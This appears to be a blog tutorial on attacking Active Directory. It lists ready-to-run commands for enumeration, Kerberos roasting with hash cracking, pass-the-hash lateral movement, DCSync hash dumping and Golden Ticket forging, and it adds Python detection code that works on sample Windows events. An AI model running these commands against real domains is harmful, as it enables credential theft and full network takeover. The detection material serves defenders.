
Active Directory Attacks — Complete AD Hacking Playbook

Anuj Singh (Admin), 31 March 2026

Active Directory Hacking Playbook

Active Directory is used by more than 90% of enterprise networks, and because it holds every account, group and trust in the organisation, compromising AD typically means control of the entire company.

Phase 1: Initial Enumeration

```bash
# Without credentials
nmap -p 389,636,88,445 10.10.10.0/24     # Find domain controllers
enum4linux -a 10.10.10.5                   # SMB enumeration
crackmapexec smb 10.10.10.0/24            # SMB scanning
```

Phase 2: With Low-Privilege User

```bash
# BloodHound — Map AD attack paths
bloodhound-python -u user -p pass -ns DC_IP -d domain.com -c all
```

```powershell
# PowerView enumeration
Get-DomainUser | Select samaccountname,memberof
Get-DomainGroup "Domain Admins" | Select member
Find-LocalAdminAccess
```

Phase 3: Privilege Escalation

Kerberoasting

```bash
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
hashcat -m 13100 hashes.txt wordlist.txt
```

AS-REP Roasting

```bash
GetNPUsers.py domain/ -dc-ip DC_IP -usersfile users.txt -no-pass
hashcat -m 18200 hashes.txt wordlist.txt
```
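Both roasting techniques leave a distinctive trace on the domain controller: Kerberoasting shows up as a burst of service-ticket requests (Security event 4769) with RC4 encryption (0x17) for user rather than computer accounts, and AS-REP roasting shows up as a TGT issued (event 4768) with pre-authentication type 0. The following detection logic is an added example for this post, not code from the original author; the event records are constructed samples that mirror the relevant 4768/4769 fields, and the threshold of three RC4 tickets is an assumption to tune per environment.

```python
"""Detect Kerberoasting and AS-REP roasting from Windows Security
events 4769 (TGS request) and 4768 (TGT request).

Added example, not code from the original post. SAMPLE_EVENTS are
constructed records, not real telemetry.
"""
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC

# Constructed sample events (values made up for the example).
SAMPLE_EVENTS = [
    # Normal: a workstation requesting a service ticket with AES (0x12).
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50", "Status": "0x0"},
    # Kerberoasting pattern: RC4 service tickets for several user SPN
    # accounts, all requested by one client in a short burst.
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.77", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.77", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.77", "Status": "0x0"},
    # Normal TGT request with pre-authentication (PreAuthType 2 = PA-ENC-TIMESTAMP).
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50", "Status": "0x0"},
    # AS-REP roasting pattern: TGT issued with no pre-authentication (PreAuthType 0).
    {"EventID": 4768, "TargetUserName": "svc_legacy", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.77", "Status": "0x0"},
]


def kerberoast_suspects(events, min_rc4_tgs=3):
    """Return {client_ip: [service names]} for clients that obtained at least
    min_rc4_tgs RC4 service tickets for user (non-computer) accounts."""
    by_client = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e.get("Status") != "0x0":
            continue
        if e["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        # Computer accounts end in '$' and krbtgt is the TGS itself; neither
        # is a roasting target, so skip them to cut noise.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_client[e["IpAddress"]].add(svc)
    return {ip: sorted(s) for ip, s in by_client.items() if len(s) >= min_rc4_tgs}


def asrep_roast_suspects(events):
    """Return (client_ip, account) pairs where a TGT was issued without
    pre-authentication, i.e. the account has DONT_REQ_PREAUTH set."""
    hits = []
    for e in events:
        if e["EventID"] != 4768 or e.get("Status") != "0x0":
            continue
        if e.get("PreAuthType") == "0":
            hits.append((e["IpAddress"], e["TargetUserName"]))
    return hits


if __name__ == "__main__":
    print("Kerberoasting:", kerberoast_suspects(SAMPLE_EVENTS))
    print("AS-REP roasting:", asrep_roast_suspects(SAMPLE_EVENTS))
```

The same fields drive the mitigation side: accounts with SPNs should be moved to AES-only encryption (or to group Managed Service Accounts) so the 0x17 tickets stop appearing at all, and any account flagged by the second check should have "Do not require Kerberos preauthentication" cleared unless a legacy client genuinely needs it. Legacy systems that still negotiate RC4 will generate false positives for the first check, which is why it counts distinct service names per client rather than alerting on a single ticket.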

Phase 4: Lateral Movement

```bash
# Pass-the-Hash
crackmapexec smb 10.10.10.0/24 -u admin -H hash --sam

# WMIExec
wmiexec.py domain/admin@target -hashes :ntlmhash

# PSExec
psexec.py domain/admin:pass@target
```
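Whatever the tool, each of these hops is a network logon (Security event 4624, logon type 3) on the target host, and a hash sprayed across a /24 produces one account appearing on many machines within minutes. The fan-out check below is an added example, not code from the original post; the logon records are constructed samples, and the window of five minutes and the threshold of five hosts are assumptions to tune against a baseline of normal admin activity.

```python
"""Flag one account performing network logons to many distinct hosts in
a short window, the footprint of pass-the-hash / psexec-style lateral
movement. Added example, not code from the original post; SAMPLE_LOGONS
are constructed records.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4624 records:
# (timestamp, computer that logged the event, TargetUserName, IpAddress,
#  LogonType, AuthenticationPackageName)
SAMPLE_LOGONS = [
    ("2026-03-31T09:00:01", "WS01", "alice", "10.10.10.50", 3, "Kerberos"),
    ("2026-03-31T09:00:05", "WS02", "admin", "10.10.10.77", 3, "NTLM"),
    ("2026-03-31T09:00:06", "WS03", "admin", "10.10.10.77", 3, "NTLM"),
    ("2026-03-31T09:00:07", "WS04", "admin", "10.10.10.77", 3, "NTLM"),
    ("2026-03-31T09:00:09", "FS01", "admin", "10.10.10.77", 3, "NTLM"),
    ("2026-03-31T09:00:11", "DB01", "admin", "10.10.10.77", 3, "NTLM"),
    ("2026-03-31T09:30:00", "WS01", "alice", "10.10.10.50", 2, "Negotiate"),
    ("2026-03-31T13:00:00", "WS09", "bob", "10.10.10.60", 3, "NTLM"),
]


def lateral_fanout(logons, window=timedelta(minutes=5), min_hosts=5):
    """Group type-3 logons by (account, source IP) and return the pairs that
    reach at least min_hosts distinct computers inside any `window`-long span,
    together with the hosts touched and the auth packages used."""
    by_pair = defaultdict(list)
    for ts, computer, user, ip, logon_type, package in logons:
        if logon_type != 3:  # only network logons are lateral hops
            continue
        by_pair[(user, ip)].append((datetime.fromisoformat(ts), computer, package))

    alerts = {}
    for pair, rows in by_pair.items():
        rows.sort()
        # Slide a window anchored at each logon; stop at the first hit.
        for i, (start, _, _) in enumerate(rows):
            hosts, packages = set(), set()
            for ts, host, package in rows[i:]:
                if ts - start > window:
                    break
                hosts.add(host)
                packages.add(package)
            if len(hosts) >= min_hosts:
                alerts[pair] = {"hosts": sorted(hosts), "auth": sorted(packages)}
                break
    return alerts


if __name__ == "__main__":
    for (user, ip), info in lateral_fanout(SAMPLE_LOGONS).items():
        print(f"{user} from {ip} reached {len(info['hosts'])} hosts via {info['auth']}")
```

The authentication package is a useful secondary signal: a raw NTLM hash cannot obtain Kerberos tickets, so pass-the-hash sessions arrive as NTLM network logons even in domains where Kerberos is the norm. Tiered admin accounts that are only ever used from a handful of jump hosts keep the baseline low enough that a threshold like this stays actionable.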

Phase 5: Domain Dominance

```bash
# DCSync — dump all domain hashes
secretsdump.py domain/admin:pass@DC_IP

# Golden Ticket — permanent access
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXX -domain domain.com admin
```
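DCSync works by asking a domain controller to replicate directory data, so the host-side evidence is Security event 4662 showing a principal exercising the DS-Replication-Get-Changes extended rights on the domain object. Only domain controllers (and a known sync connector, if one exists) should ever do that. The check below is an added example rather than code from the original post: the GUIDs are the real extended-right identifiers, the 4662 records are constructed samples, and the allowlist of expected replicators is an assumption that must be set per domain.

```python
"""Detect DCSync-style replication requests in Windows Security event 4662.

Added example, not code from the original post. SAMPLE_EVENTS are
constructed; EXPECTED_REPLICATORS is an assumed per-domain allowlist.
"""
import re

# Extended-right GUIDs a directory replication request exercises.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Assumed allowlist: DC machine accounts plus any account that legitimately
# replicates (an identity-sync service, for example). Tune per domain.
EXPECTED_REPLICATORS = {"DC01$", "DC02$"}

CONTROL_ACCESS = 0x100  # AccessMask bit for "Control Access" operations
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample 4662 events with only the fields the check uses.
SAMPLE_EVENTS = [
    # Normal inter-DC replication.
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account exercising replication rights: DCSync indicator.
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Some other control-access operation (sample GUID, not a replication right).
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},
]


def replication_rights_in(properties):
    """Return the replication-right GUIDs present in a 4662 Properties field."""
    found = {g.lower() for g in GUID_RE.findall(properties)}
    return found & REPLICATION_RIGHTS


def dcsync_suspects(events, expected=EXPECTED_REPLICATORS):
    """Return [(account, sorted rights)] for 4662 events in which a principal
    outside the allowlist exercised DS-Replication-Get-Changes rights."""
    hits = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        if int(e["AccessMask"], 16) & CONTROL_ACCESS == 0:
            continue
        rights = replication_rights_in(e["Properties"])
        if not rights or e["SubjectUserName"] in expected:
            continue
        hits.append((e["SubjectUserName"], sorted(rights)))
    return hits


if __name__ == "__main__":
    for account, rights in dcsync_suspects(SAMPLE_EVENTS):
        print(f"replication rights used by non-DC principal {account}: {rights}")
```

Event 4662 is only generated when "Audit Directory Service Access" is enabled and the domain object's SACL audits control-access operations, so the audit policy is a prerequisite for this check. On the Golden Ticket side, the krbtgt secret is what makes the ticket valid, which is why incident response after a confirmed DCSync includes resetting the krbtgt password twice (so both the current and previous key are rotated) and reviewing which principals hold replication rights on the domain object.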

